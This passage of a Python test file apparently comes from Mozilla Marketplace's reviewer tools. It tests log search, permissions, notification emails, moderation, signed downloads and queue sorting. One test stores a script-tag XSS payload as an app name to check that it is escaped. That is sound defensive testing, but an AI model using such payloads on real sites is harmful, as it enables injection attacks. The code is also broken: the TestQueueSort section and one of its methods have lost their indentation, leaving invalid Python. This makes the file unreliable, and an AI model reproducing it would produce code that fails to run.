        doc = pq(r.content)
        assert doc('#log-filter button'), 'No filters.'
        # Should have 2 showing.
        rows = doc('tbody tr')
        eq_(rows.filter(':not(.hide)').length, 2)
        eq_(rows.filter('.hide').eq(0).text(), 'youwin')

    def test_search_app_soft_deleted(self):
        self.make_approvals()
        self.apps[0].update(status=amo.STATUS_DELETED)
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        doc = pq(res.content)
        all_reviews = [d.attrib.get('data-addonid')
                       for d in doc('#log-listing tbody tr')]
        assert str(self.apps[0].pk) in all_reviews, (
            'Soft deleted review did not show up in listing')

    def test_xss(self):
        a = self.apps[0]
        a.name = '<script>alert("xss")</script>'
        a.save()
        amo.log(amo.LOG.REJECT_VERSION, a, a.current_version,
                user=self.get_user(), details={'comments': 'xss!'})

        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        inner_html = pq(r.content)('#log-listing tbody td').eq(1).html()

        # The app name must be HTML-escaped in the rendered log: the
        # escaped form appears, the raw tag does not. (The first assertion
        # previously checked the raw '<script>', contradicting the second
        # — almost certainly an entity-mangled '&lt;script&gt;'.)
        assert '&lt;script&gt;' in inner_html
        assert '<script>' not in inner_html

    def test_end_filter(self):
        """
        Let's use today as an end-day filter and make sure we see stuff if we
        filter.
        """
        self.make_approvals()
        # Make sure we show the stuff we just made.
        date = time.strftime('%Y-%m-%d')
        r = self.client.get(self.url, dict(end=date))
        eq_(r.status_code, 200)
        doc = pq(r.content)('#log-listing tbody')
        eq_(doc('tr:not(.hide)').length, 2)
        eq_(doc('tr.hide').eq(0).text(), 'youwin')

    def test_end_filter_wrong(self):
        """
        An invalid end-day filter value is ignored instead of crashing.
        """
        self.make_approvals()
        r = self.client.get(self.url, dict(end='wrong!'))
        # If this is broken, we'll get a traceback.
        eq_(r.status_code, 200)
        eq_(pq(r.content)('#log-listing tr:not(.hide)').length, 3)

    def test_search_comment_exists(self):
        """Search by comment."""
        self.make_an_approval(amo.LOG.ESCALATE_MANUAL, comment='hello')
        r = self.client.get(self.url, dict(search='hello'))
        eq_(r.status_code, 200)
        eq_(pq(r.content)('#log-listing tbody tr.hide').eq(0).text(), 'hello')

    def test_search_comment_doesnt_exist(self):
        """Search by comment, with no results."""
        self.make_an_approval(amo.LOG.ESCALATE_MANUAL, comment='hello')
        r = self.client.get(self.url, dict(search='bye'))
        eq_(r.status_code, 200)
        eq_(pq(r.content)('.no-results').length, 1)

    def test_search_author_exists(self):
        """Search by author."""
        self.make_approvals()
        self.make_an_approval(amo.LOG.ESCALATE_MANUAL, username='editor',
                              comment='hi')

        r = self.client.get(self.url, dict(search='editor'))
        eq_(r.status_code, 200)
        rows = pq(r.content)('#log-listing tbody tr')
        eq_(rows.filter(':not(.hide)').length, 1)
        eq_(rows.filter('.hide').eq(0).text(), 'hi')

    def test_search_author_doesnt_exist(self):
        """Search by author, with no results."""
        self.make_approvals()
        self.make_an_approval(amo.LOG.ESCALATE_MANUAL, username='editor')

        r = self.client.get(self.url, dict(search='wrong'))
        eq_(r.status_code, 200)
        eq_(pq(r.content)('.no-results').length, 1)

    def test_search_addon_exists(self):
        """Search by add-on name."""
        self.make_approvals()
        app = self.apps[0]
        r = self.client.get(self.url, dict(search=app.name))
        eq_(r.status_code, 200)
        tr = pq(r.content)('#log-listing tr[data-addonid="%s"]' % app.id)
        eq_(tr.length, 1)
        eq_(tr.siblings('.comments').text(), 'youwin')

    def test_search_addon_by_slug_exists(self):
        """Search by app slug."""
        app = self.apps[0]
        app.app_slug = 'a-fox-was-sly'
        app.save()
        self.make_approvals()
        r = self.client.get(self.url, dict(search='fox'))
        eq_(r.status_code, 200)
        tr = pq(r.content)('#log-listing tr[data-addonid="%s"]' % app.id)
        eq_(tr.length, 1)
        eq_(tr.siblings('.comments').text(), 'youwin')

    def test_search_addon_doesnt_exist(self):
        """Search by add-on name, with no results."""
        self.make_approvals()
        r = self.client.get(self.url, dict(search='zzz'))
        eq_(r.status_code, 200)
        eq_(pq(r.content)('.no-results').length, 1)

    @mock.patch('devhub.models.ActivityLog.arguments', new=mock.Mock)
    def test_addon_missing(self):
        """Entries whose app is gone render a deletion placeholder."""
        self.make_approvals()
        r = self.client.get(self.url)
        eq_(pq(r.content)('#log-listing tr td').eq(1).text(),
            'App has been deleted.')

    def test_request_info_logs(self):
        self.make_an_approval(amo.LOG.REQUEST_INFORMATION)
        r = self.client.get(self.url)
        eq_(pq(r.content)('#log-listing tr td a').eq(1).text(),
            'More information requested')

    def test_escalate_logs(self):
        self.make_an_approval(amo.LOG.ESCALATE_MANUAL)
        r = self.client.get(self.url)
        eq_(pq(r.content)('#log-listing tr td a').eq(1).text(),
            'Reviewer escalation')

    def test_no_double_encode(self):
        version = self.apps[0].current_version
        version.update(version='<foo>')
        self.make_an_approval(amo.LOG.ESCALATE_MANUAL)
        r = self.client.get(self.url)
        # pq .text() decodes entities once, so a correctly single-encoded
        # version string comes back as the raw '<foo>'.
        assert '<foo>' in pq(r.content)('#log-listing tr td').eq(1).text(), (
            'Double-encoded string was found in reviewer log.')
class TestMotd(AppReviewerTest, AccessMixin):
    """Tests for viewing and editing the reviewers' message of the day."""

    def setUp(self):
        super(TestMotd, self).setUp()
        self.url = reverse('reviewers.apps.motd')
        self.key = u'mkt_reviewers_motd'
        set_config(self.key, u'original value')

    def test_perms_not_editor(self):
        """Anonymous users get redirected to login; non-reviewers get 403."""
        self.client.logout()
        req = self.client.get(self.url, follow=True)
        self.assert3xx(req, '%s?to=%s' % (reverse('users.login'), self.url))
        self.client.login(username='[email protected]',
                          password='password')
        eq_(self.client.get(self.url).status_code, 403)

    def test_perms_not_motd(self):
        """Reviewers without the MOTD permission can view but not save."""
        # Any type of reviewer can see the MOTD.
        self.login_as_editor()
        req = self.client.get(self.url)
        eq_(req.status_code, 200)
        eq_(req.context['form'], None)
        # No redirect means it didn't save.
        eq_(self.client.post(self.url, dict(motd='motd')).status_code, 200)
        eq_(get_config(self.key), u'original value')

    def test_motd_change(self):
        """Users with AppReviewerMOTD:Edit can save a new MOTD."""
        # Only users in the MOTD group can POST.
        user = UserProfile.objects.get(email='[email protected]')
        self.grant_permission(user, 'AppReviewerMOTD:Edit')
        self.login_as_editor()

        # Get is a 200 with a form.
        req = self.client.get(self.url)
        eq_(req.status_code, 200)
        eq_(req.context['form'].initial['motd'], u'original value')
        # Empty post throws an error.
        req = self.client.post(self.url, dict(motd=''))
        eq_(req.status_code, 200)  # Didn't redirect after save.
        eq_(pq(req.content)('#editor-motd .errorlist').text(),
            'This field is required.')
        # A real post now.
        req = self.client.post(self.url, dict(motd='new motd'))
        self.assert3xx(req, self.url)
        eq_(get_config(self.key), u'new motd')
class TestReviewAppComm(AppReviewerTest, AttachmentManagementMixin):
    """
    Test communication threads + notes are created and that emails are
    sent to the right groups of people.
    """
    fixtures = ['base/users']

    def setUp(self):
        super(TestReviewAppComm, self).setUp()
        self.create_switch('comm-dashboard', db=True)
        self.app = app_factory(rated=True, status=amo.STATUS_PENDING,
                               mozilla_contact='[email protected]')
        self.app.addonuser_set.create(user=user_factory(username='dev'))
        self.url = reverse('reviewers.apps.review', args=[self.app.app_slug])

        self.contact = user_factory(username='contact')

    def _post(self, data, queue='pending'):
        """POST the review form and assert the redirect back to `queue`."""
        res = self.client.post(self.url, data)
        self.assert3xx(res, reverse('reviewers.apps.queue_%s' % queue))

    def _get_note(self):
        """Return the single note on the app's single thread."""
        eq_(self.app.threads.count(), 1)
        thread = self.app.threads.all()[0]
        eq_(thread.notes.count(), 1)
        return thread.notes.all()[0]

    def _check_email(self, msg, subject, to=None):
        """Assert recipients, subject and sender of one notification email."""
        if to:
            eq_(msg.to, to)
        else:
            eq_(msg.to, list(self.app.authors.values_list('email', flat=True)))

        eq_(msg.cc, [])
        eq_(msg.subject, '%s: %s' % (subject, self.app.name))
        eq_(msg.from_email, settings.MKT_REVIEWERS_EMAIL)

    def _get_mail(self, username):
        """Return the first outbox message addressed to `username`."""
        return filter(lambda x: x.to[0].startswith(username),
                      mail.outbox)[0]

    def _check_email_dev_and_contact(self, outbox_len=2):
        """
        Helper for checking developer and Mozilla contact get emailed with
        'Submission Update' email.
        """
        eq_(len(mail.outbox), outbox_len)
        self._check_email(  # Developer.
            self._get_mail('dev'), 'Submission Update')
        self._check_email(  # Mozilla contact.
            self._get_mail('contact'), 'Submission Update',
            to=[self.contact.email])

    def test_email_cc(self):
        """
        Emailed cc'ed people (those who have posted on the thread).
        """
        poster = user_factory()
        thread, note = create_comm_note(
            self.app, self.app.current_version, poster, 'lgtm')

        data = {'action': 'public', 'comments': 'gud jerb'}
        data.update(self._attachment_management_form(num=0))
        self._post(data)

        # Test emails.
        self._check_email_dev_and_contact(outbox_len=5)
        self._check_email(  # Some person who joined the thread.
            self._get_mail(poster.username), 'Submission Update',
            to=[poster.email])

    def test_approve(self):
        """
        On approval, send an email to [developer, mozilla contact].
        """
        data = {'action': 'public', 'comments': 'gud jerb'}
        data.update(self._attachment_management_form(num=0))
        self._post(data)

        # Test notes.
        note = self._get_note()
        eq_(note.note_type, comm.APPROVAL)
        eq_(note.body, 'gud jerb')

        # Test emails.
        self._check_email_dev_and_contact()

    def test_reject(self):
        """
        On rejection, send an email to [developer, mozilla contact].
        """
        data = {'action': 'reject', 'comments': 'rubesh'}
        data.update(self._attachment_management_form(num=0))
        self._post(data)

        # Test notes.
        note = self._get_note()
        eq_(note.note_type, comm.REJECTION)
        eq_(note.body, 'rubesh')

        # Test emails.
        self._check_email_dev_and_contact()

    def test_info(self):
        """
        On info request, send an email to [developer, mozilla contact].
        """
        data = {'action': 'info', 'comments': 'huh'}
        data.update(self._attachment_management_form(num=0))
        self._post(data)

        # Test notes.
        note = self._get_note()
        eq_(note.note_type, comm.MORE_INFO_REQUIRED)
        eq_(note.body, 'huh')

        # Test emails.
        self._check_email_dev_and_contact()

    def test_escalate(self):
        """
        On escalation, send an email to [senior reviewers].
        """
        admin = user_factory()
        group = Group.objects.create(name='Senior App Reviewers')
        group.groupuser_set.create(user=admin)

        data = {'action': 'escalate', 'comments': 'soup her man'}
        data.update(self._attachment_management_form(num=0))
        self._post(data)

        # Test notes.
        note = self._get_note()
        eq_(note.note_type, comm.ESCALATION)
        eq_(note.body, 'soup her man')

        # Test emails.
        eq_(len(mail.outbox), 1)
        self._check_email(  # Senior reviewer.
            mail.outbox[0], 'Escalated Review Requested', to=[admin.email])

    def test_comment(self):
        """
        On reviewer comment, send an email to those but developers.
        """
        data = {'action': 'comment', 'comments': 'huh'}
        data.update(self._attachment_management_form(num=0))
        self._post(data)

        # Test notes.
        note = self._get_note()
        eq_(note.note_type, comm.REVIEWER_COMMENT)
        eq_(note.body, 'huh')

        # Test emails.
        eq_(len(mail.outbox), 1)
        self._check_email(  # Mozilla contact.
            mail.outbox[0], 'Submission Update', to=[self.contact.email])

    def test_disable(self):
        """
        On disable, send an email to [developer, mozilla contact].
        """
        self.login_as_admin()

        data = {'action': 'disable', 'comments': 'u dun it'}
        data.update(self._attachment_management_form(num=0))
        self._post(data)

        # Test notes.
        note = self._get_note()
        eq_(note.note_type, comm.DISABLED)
        eq_(note.body, 'u dun it')

        # Test emails.
        self._check_email_dev_and_contact()

    def test_attachments(self):
        """Attachments uploaded with the form end up attached to the note."""
        data = {'action': 'comment', 'comments': 'huh'}
        data.update(self._attachment_management_form(num=2))
        data.update(self._attachments(num=2))
        self._post(data)

        # Test attachments.
        note = self._get_note()
        eq_(note.attachments.count(), 2)
class TestModeratedQueue(AppReviewerTest, AccessMixin):
    """Tests for the moderated-reviews queue (user ratings flagged for
    editor attention)."""
    fixtures = ['base/users']

    def setUp(self):
        # NOTE(review): super().setUp() is not called here; the reviewer is
        # logged in explicitly below — confirm this is intentional.
        self.app = app_factory()

        self.reviewer = UserProfile.objects.get(email='[email protected]')
        self.users = list(UserProfile.objects.exclude(pk=self.reviewer.id))

        self.url = reverse('reviewers.apps.queue_moderated')

        # Two flagged reviews: one spam-flagged, one support-flagged.
        self.review1 = Review.objects.create(addon=self.app, body='body',
                                             user=self.users[0], rating=3,
                                             editorreview=True)
        ReviewFlag.objects.create(review=self.review1, flag=ReviewFlag.SPAM,
                                  user=self.users[0])
        self.review2 = Review.objects.create(addon=self.app, body='body',
                                             user=self.users[1], rating=4,
                                             editorreview=True)
        ReviewFlag.objects.create(review=self.review2, flag=ReviewFlag.SUPPORT,
                                  user=self.users[1])

        self.client.login(username=self.reviewer.email, password='password')

    def _post(self, action):
        """Submit the moderation formset applying `action` to the first row."""
        ctx = self.client.get(self.url).context
        data_formset = formset(initial(ctx['reviews_formset'].forms[0]))
        data_formset['form-0-action'] = action

        res = self.client.post(self.url, data_formset)
        self.assert3xx(res, self.url)

    def _get_logs(self, action):
        """Return activity-log entries recorded for `action`."""
        return ActivityLog.objects.filter(action=action.id)

    def test_setup(self):
        eq_(Review.objects.filter(editorreview=True).count(), 2)
        eq_(ReviewFlag.objects.filter(flag=ReviewFlag.SPAM).count(), 1)

        res = self.client.get(self.url)
        doc = pq(res.content)('#reviews-flagged')

        # Test the default action is "skip".
        eq_(doc('.reviewers-desktop #id_form-0-action_1:checked').length, 1)

    def test_skip(self):
        # Skip the first review, which still leaves two.
        self._post(mkt.ratings.REVIEW_MODERATE_SKIP)
        res = self.client.get(self.url)
        eq_(len(res.context['page'].object_list), 2)

    def test_delete(self):
        # Delete the first review, which leaves one.
        self._post(mkt.ratings.REVIEW_MODERATE_DELETE)
        res = self.client.get(self.url)
        eq_(len(res.context['page'].object_list), 1)
        eq_(self._get_logs(amo.LOG.DELETE_REVIEW).count(), 1)

    def test_keep(self):
        # Keep the first review, which leaves one.
        self._post(mkt.ratings.REVIEW_MODERATE_KEEP)
        res = self.client.get(self.url)
        eq_(len(res.context['page'].object_list), 1)
        eq_(self._get_logs(amo.LOG.APPROVE_REVIEW).count(), 1)

    def test_no_reviews(self):
        Review.objects.all().delete()
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        eq_(pq(res.content)('#reviews-flagged .no-results').length, 1)

    def test_queue_count(self):
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
        eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (0)')
        eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
        eq_(doc('.tabnav li a:eq(3)').text(), u'Moderated Reviews (2)')

    def test_queue_count_senior_reviewer(self):
        # Senior reviewers also get the Escalations tab.
        self.login_as_senior_reviewer()
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
        eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (0)')
        eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
        eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (0)')
        eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (2)')
class TestGetSigned(BasePackagedAppTest, amo.tests.TestCase):
    """Tests for downloading the reviewer-signed copy of a packaged app."""
    fixtures = fixture('webapp_337141', 'user_999', 'user_editor',
                       'user_editor_group', 'group_editor')

    def setUp(self):
        super(TestGetSigned, self).setUp()
        self.url = reverse('reviewers.signed', args=[self.app.app_slug,
                                                     self.version.pk])
        self.login('[email protected]')

    def test_not_logged_in(self):
        self.client.logout()
        self.assertLoginRequired(self.client.get(self.url))

    def test_not_reviewer(self):
        self.client.logout()
        self.login('[email protected]')
        eq_(self.client.get(self.url).status_code, 403)

    @mock.patch('lib.crypto.packaged.sign')
    def test_reviewer_sign_arguments(self, sign_mock):
        """Signing is requested with the reviewer flag set."""
        self.setup_files()
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        sign_mock.assert_called_with(self.version.pk, reviewer=True)

    @mock.patch.object(packaged, 'sign', mock_sign)
    def test_reviewer(self):
        """The signed file is served via x-sendfile with a hash-based etag."""
        if not settings.XSENDFILE:
            raise SkipTest()

        self.setup_files()
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        file_ = self.app.current_version.all_files[0]
        eq_(res['x-sendfile'], file_.signed_reviewer_file_path)
        eq_(res['etag'], '"%s"' % file_.hash.split(':')[-1])

    def test_not_packaged(self):
        self.app.update(is_packaged=False)
        res = self.client.get(self.url)
        eq_(res.status_code, 404)

    def test_wrong_version(self):
        self.url = reverse('reviewers.signed', args=[self.app.app_slug, 0])
        res = self.client.get(self.url)
        eq_(res.status_code, 404)

    def test_token_good(self):
        """A one-time token grants anonymous access exactly once."""
        if not settings.XSENDFILE:
            raise SkipTest()

        token = Token(data={'app_id': self.app.id})
        token.save()
        self.setup_files()
        self.client.logout()

        res = self.client.get(urlparams(self.url, token=token.token))
        eq_(res.status_code, 200)
        file_ = self.app.current_version.all_files[0]
        eq_(res['x-sendfile'], file_.signed_reviewer_file_path)
        eq_(res['etag'], '"%s"' % file_.hash.split(':')[-1])

        # Test token doesn't work the 2nd time.
        res = self.client.get(urlparams(self.url, token=token.token))
        eq_(res.status_code, 403)

    def test_token_bad(self):
        token = Token(data={'app_id': 'abcdef'})
        token.save()
        self.setup_files()
        self.client.logout()

        res = self.client.get(urlparams(self.url, token=token.token))
        eq_(res.status_code, 403)
class TestMiniManifestView(BasePackagedAppTest):
    """Tests for the reviewer-facing mini-manifest of a packaged app."""
    fixtures = fixture('user_editor', 'user_editor_group', 'group_editor',
                       'user_999', 'webapp_337141')

    def setUp(self):
        super(TestMiniManifestView, self).setUp()
        self.app = Webapp.objects.get(pk=337141)
        self.app.update(is_packaged=True)
        self.version = self.app.versions.latest()
        self.file = self.version.all_files[0]
        self.file.update(filename='mozball.zip')
        self.url = reverse('reviewers.mini_manifest', args=[self.app.app_slug,
                                                            self.version.pk])
        self.login('[email protected]')

    def test_not_logged_in(self):
        self.client.logout()
        self.assertLoginRequired(self.client.get(self.url))

    def test_not_reviewer(self):
        self.client.logout()
        self.client.login(username='[email protected]', password='password')
        eq_(self.client.get(self.url).status_code, 403)

    def test_not_packaged(self):
        self.app.update(is_packaged=False)
        res = self.client.get(self.url)
        eq_(res.status_code, 404)

    def test_wrong_version(self):
        url = reverse('reviewers.mini_manifest', args=[self.app.app_slug, 0])
        res = self.client.get(url)
        eq_(res.status_code, 404)

    def test_reviewer(self):
        """Reviewers get a mini-manifest pointing at the signed package."""
        self.setup_files()
        manifest = self.app.get_manifest_json(self.file)

        res = self.client.get(self.url)
        eq_(res['Content-type'],
            'application/x-web-app-manifest+json; charset=utf-8')
        data = json.loads(res.content)
        eq_(data['name'], manifest['name'])
        eq_(data['developer']['name'], 'Mozilla Marketplace')
        eq_(data['package_path'],
            absolutify(reverse('reviewers.signed',
                               args=[self.app.app_slug, self.version.id])))

    def test_rejected(self):
        """The mini-manifest still works for rejected (disabled) files."""
        # Rejected sets file.status to DISABLED and moves to a guarded path.
        self.setup_files()
        self.app.update(status=amo.STATUS_REJECTED)
        self.file.update(status=amo.STATUS_DISABLED)

        manifest = self.app.get_manifest_json(self.file)

        res = self.client.get(self.url)
        eq_(res['Content-type'],
            'application/x-web-app-manifest+json; charset=utf-8')
        data = json.loads(res.content)
        eq_(data['name'], manifest['name'])
        eq_(data['developer']['name'], 'Mozilla Marketplace')
        eq_(data['package_path'],
            absolutify(reverse('reviewers.signed',
                               args=[self.app.app_slug,
                                     self.version.id])))

    def test_minifest_name_matches_manifest_name(self):
        self.setup_files()
        self.app.name = 'XXX'
        self.app.save()

        manifest = self.app.get_manifest_json(self.file)

        res = self.client.get(self.url)
        data = json.loads(res.content)
        eq_(data['name'], manifest['name'])

    def test_token_good(self):
        """A one-time token grants anonymous access exactly once."""
        token = Token(data={'app_id': self.app.id})
        token.save()
        self.setup_files()
        self.client.logout()

        res = self.client.get(urlparams(self.url, token=token.token))
        eq_(res.status_code, 200)
        eq_(res['Content-type'],
            'application/x-web-app-manifest+json; charset=utf-8')
        data = json.loads(res.content)
        ok_('token=' in data['package_path'])

        # Test token doesn't work the 2nd time.
        res = self.client.get(urlparams(self.url, token=token.token))
        eq_(res.status_code, 403)

    def test_token_bad(self):
        token = Token(data={'app_id': 'abcdef'})
        token.save()
        self.setup_files()
        self.client.logout()

        res = self.client.get(urlparams(self.url, token=token.token))
        eq_(res.status_code, 403)
class TestReviewersScores(AppReviewerTest, AccessMixin):
    """Smoke tests for the reviewer performance (score) page."""
    fixtures = fixture('group_editor', 'user_editor', 'user_editor_group',
                       'user_999')

    def setUp(self):
        super(TestReviewersScores, self).setUp()
        self.login_as_editor()
        self.user = UserProfile.objects.get(email='[email protected]')
        self.url = reverse('reviewers.performance', args=[self.user.username])

    def test_404(self):
        """An unknown username 404s."""
        missing = reverse('reviewers.performance', args=['poop'])
        response = self.client.get(missing)
        eq_(response.status_code, 404)

    def test_with_username(self):
        """An explicit username resolves to that user's profile."""
        response = self.client.get(self.url)
        eq_(response.status_code, 200)
        eq_(response.context['profile'].id, self.user.id)

    def test_without_username(self):
        """Omitting the username defaults to the logged-in reviewer."""
        response = self.client.get(reverse('reviewers.performance'))
        eq_(response.status_code, 200)
        eq_(response.context['profile'].id, self.user.id)

    def test_no_reviews(self):
        """With no points awarded, the empty-state message is shown."""
        response = self.client.get(self.url)
        eq_(response.status_code, 200)
        assert u'No review points awarded yet' in response.content
class TestQueueSort(AppReviewerTest):
fixtures = ['base/users']
def setUp(self):
    """Create and set up apps for some filtering fun."""
    # Two pending apps with contrasting attributes (hosted/packaged,
    # free/premium, admin-review flag) to exercise the sort options.
    self.apps = [app_factory(name='Lillard',
                             status=amo.STATUS_PENDING,
                             is_packaged=False,
                             version_kw={'version': '1.0'},
                             file_kw={'status': amo.STATUS_PENDING},
                             admin_review=True,
                             premium_type=amo.ADDON_FREE),
                 app_factory(name='Batum',
                             status=amo.STATUS_PENDING,
                             is_packaged=True,
                             version_kw={'version': '1.0',
                                         'has_editor_comment': True,
                                         'has_info_request': True},
                             file_kw={'status': amo.STATUS_PENDING},
                             admin_review=False,
                             premium_type=amo.ADDON_PREMIUM)]

    # Set up app attributes.
    self.apps[0].update(created=self.days_ago(2))
    self.apps[1].update(created=self.days_ago(5))
    self.apps[0].addonuser_set.create(
        user=UserProfile.objects.create(username='XXX', email='XXX'))
    self.apps[1].addonuser_set.create(
        user=UserProfile.objects.create(username='illmatic',
                                        email='[email protected]'))
    self.apps[0].addondevicetype_set.create(
        device_type=amo.DEVICE_DESKTOP.id)
    self.apps[1].addondevicetype_set.create(
        device_type=amo.DEVICE_MOBILE.id)

    self.url = reverse('reviewers.apps.queue_pending')
def test_do_sort_webapp(self):
    """
    Test that apps are sorted in order specified in GET params.
    """
    rf = RequestFactory()
    qs = Webapp.objects.no_cache().all()

    # Test apps are sorted by created/asc by default.
    r = rf.get(self.url, {'sort': 'invalidsort', 'order': 'dontcare'})
    sorted_qs = _do_sort(r, qs)
    eq_(list(sorted_qs), [self.apps[1], self.apps[0]])

    # Test sorting by created, descending.
    r = rf.get(self.url, {'sort': 'created', 'order': 'desc'})
    sorted_qs = _do_sort(r, qs)
    eq_(list(sorted_qs), [self.apps[0], self.apps[1]])

    # Test sorting by app name.
    r = rf.get(self.url, {'sort': 'name', 'order': 'asc'})
    sorted_qs = _do_sort(r, qs)
    eq_(list(sorted_qs), [self.apps[1], self.apps[0]])

    r = rf.get(self.url, {'sort': 'name', 'order': 'desc'})
    sorted_qs = _do_sort(r, qs)
    eq_(list(sorted_qs), [self.apps[0], self.apps[1]])

    # By abuse reports.
    AbuseReport.objects.create(addon=self.apps[1])
    r = rf.get(self.url, {'sort': 'num_abuse_reports',
                          'order': 'asc'})
    sorted_qs = _do_sort(r, qs)
    eq_(list(sorted_qs), [self.apps[0], self.apps[1]])

    r = rf.get(self.url, {'sort': 'num_abuse_reports',
                          'order': 'desc'})
    sorted_qs = _do_sort(r, qs)
    eq_(list(sorted_qs), [self.apps[1], self.apps[0]])
def test_do_sort_version_nom(self):
    """Tests version nomination sort order."""
    url = reverse('reviewers.apps.queue_pending')
    user = UserProfile.objects.get(username='admin')

    version_0 = self.apps[0].versions.get()
    version_0.update(nomination=days_ago(1))
    version_1 = self.apps[1].versions.get()
    version_1.update(nomination=days_ago(2))

    # Throw in some disabled versions, they shouldn't affect order.
    version_factory({'status': amo.STATUS_DISABLED}, addon=self.apps[0],
                    nomination=days_ago(10))
    version_factory({'status': amo.STATUS_DISABLED}, addon=self.apps[1],
                    nomination=days_ago(1))
    version_factory({'status': amo.STATUS_DISABLED}, addon=self.apps[1],
                    nomination=days_ago(20))

    req = amo.tests.req_factory_factory(
        url, user=user, data={'sort': 'nomination'})
    res = queue_apps(req)
    doc = pq(res.content)
    # Desktop and mobile (hidden on desktop) alternate, so we jump by 2.
    eq_(doc('tbody tr')[0].get('data-addon'), str(version_1.addon.id))
    eq_(doc('tbody tr')[2].get('data-addon'), str(version_0.addon.id))

    req = amo.tests.req_factory_factory(
        url, user=user, data={'sort': 'nomination', 'order': 'desc'})
    res = queue_apps(req)
    doc = pq(res.content)
    # Desktop and mobile (hidden on desktop) alternate, so we jump by 2.
    eq_(doc('tbody tr')[0].get('data-addon'), str(version_0.addon.id))
    eq_(doc('tbody tr')[2].get('data-addon'), str(version_1.addon.id))
def test_do_sort_queue_object(self):
"""Tests sorting queue object."""
rf = RequestFactory()
url = reverse('reviewers.apps.queue_rereview')
earlier_rrq = RereviewQueue.objects.create(addon=self.apps[0])
later_rrq = RereviewQueue.objects.create(addon=self.apps[1])
later_rrq.created += datetime.timedelta(days=1)
later_rrq.save()
request = rf.get(url, {'sort': 'created'})
apps = _do_sort(request, RereviewQueue.objects.all())
# Assert the order that RereviewQueue objects were created is
# maintained.
eq_([earlier_rrq.addon, later_rrq.addon], list(apps))
request = rf.get(url, {'sort': 'created', 'order': 'desc'})
apps = _do_sort(request, RereviewQueue.objects.all())
eq_([later_rrq.addon, earlier_rrq.addon], list(apps))
request = rf.get(url, {'sort': 'name', 'order': 'asc'})
apps = _do_sort(request, RereviewQueue.objects.all())
eq_([later_rrq.addon, earlier_rrq.addon], list(apps))
request = rf.get(url, {'sort': 'name', 'order': 'desc'})
apps = _do_sort(request, RereviewQueue.objects.all())
eq_([earlier_rrq.addon, later_rrq.addon], list(apps))
    def test_sort_with_priority_review(self):
        """Tests the sorts are correct with a priority review flagged app."""
        # Set up the priority review flagged app.
        self.apps.append(app_factory(name='Foxkeh',
                                     status=amo.STATUS_PENDING,
                                     is_packaged=False,
                                     version_kw={'version': '1.0'},
                                     file_kw={'status': amo.STATUS_PENDING},
                                     premium_type=amo.ADDON_FREE,
                                     priority_review=True))
        # Set up app attributes.
        self.apps[2].update(created=self.days_ago(1))
        self.apps[2].addonuser_set.create(
            user=UserProfile.objects.create(username='redpanda',
                                            email='[email protected]'))
        self.apps[2].addondevicetype_set.create(
            device_type=amo.DEVICE_DESKTOP.id)
        # And check it also comes out top of waiting time with Webapp model.
        rf = RequestFactory()
        qs = Webapp.objects.no_cache().all()
        # Test apps are sorted by created/asc by default.
        # In every assertion below, the priority-review app (apps[2]) comes
        # first regardless of the requested sort key or direction.
        r = rf.get(self.url, {'sort': 'invalidsort', 'order': 'dontcare'})
        sorted_qs = _do_sort(r, qs)
        eq_(list(sorted_qs), [self.apps[2], self.apps[1], self.apps[0]])
        # Test sorting by created, descending.
        r = rf.get(self.url, {'sort': 'created', 'order': 'desc'})
        sorted_qs = _do_sort(r, qs)
        eq_(list(sorted_qs), [self.apps[2], self.apps[0], self.apps[1]])
        # And with Version model.
        version_0 = self.apps[0].versions.get()
        version_0.update(nomination=days_ago(1))
        version_1 = self.apps[1].versions.get()
        version_1.update(nomination=days_ago(2))
        # Mirror the queryset the pending queue view builds.
        qs = (Version.objects.no_cache().filter(
            files__status=amo.STATUS_PENDING, addon__type=amo.ADDON_WEBAPP,
            addon__disabled_by_user=False,
            addon__status=amo.STATUS_PENDING)
            .order_by('nomination', 'created')
            .select_related('addon', 'files').no_transforms())
        r = rf.get(self.url, {'sort': 'nomination'})
        sorted_qs = _do_sort(r, qs, date_sort='nomination')
        # Priority app first, then by nomination date ascending.
        eq_(list(sorted_qs), [self.apps[2], self.apps[1], self.apps[0]])
        r = rf.get(self.url, {'sort': 'nomination', 'order': 'desc'})
        sorted_qs = _do_sort(r, qs, date_sort='nomination')
        eq_(list(sorted_qs), [self.apps[2], self.apps[0], self.apps[1]])
        # And with Rereview model.
        url = reverse('reviewers.apps.queue_rereview')
        earlier_rrq = RereviewQueue.objects.create(addon=self.apps[0])
        earlier_rrq.created += datetime.timedelta(days=1)
        earlier_rrq.save()
        later_rrq = RereviewQueue.objects.create(addon=self.apps[1])
        later_rrq.created += datetime.timedelta(days=2)
        later_rrq.save()
        pri_rrq = RereviewQueue.objects.create(addon=self.apps[2])
        pri_rrq.save()
        request = rf.get(url, {'sort': 'created'})
        apps = _do_sort(request, RereviewQueue.objects.all())
        eq_([pri_rrq.addon, earlier_rrq.addon, later_rrq.addon], list(apps))
        request = rf.get(url, {'sort': 'created', 'order': 'desc'})
        apps = _do_sort(request, RereviewQueue.objects.all())
        eq_([pri_rrq.addon, later_rrq.addon, earlier_rrq.addon], list(apps))
class TestAppsReviewing(AppReviewerTest, AccessMixin):
    """Checks the 'apps currently being reviewed' page tracks per-reviewer
    viewing locks without leaking between reviewer sessions."""

    def setUp(self):
        self.login_as_editor()
        super(TestAppsReviewing, self).setUp()
        self.url = reverse('reviewers.apps.apps_reviewing')
        self.apps = [app_factory(name=name, status=amo.STATUS_PENDING)
                     for name in ('Antelope', 'Bear', 'Cougar')]

    def _view_app(self, app_id):
        # Mark `app_id` as currently being viewed by the logged-in reviewer.
        self.client.post(reverse('editors.review_viewing'),
                         {'addon_id': app_id})

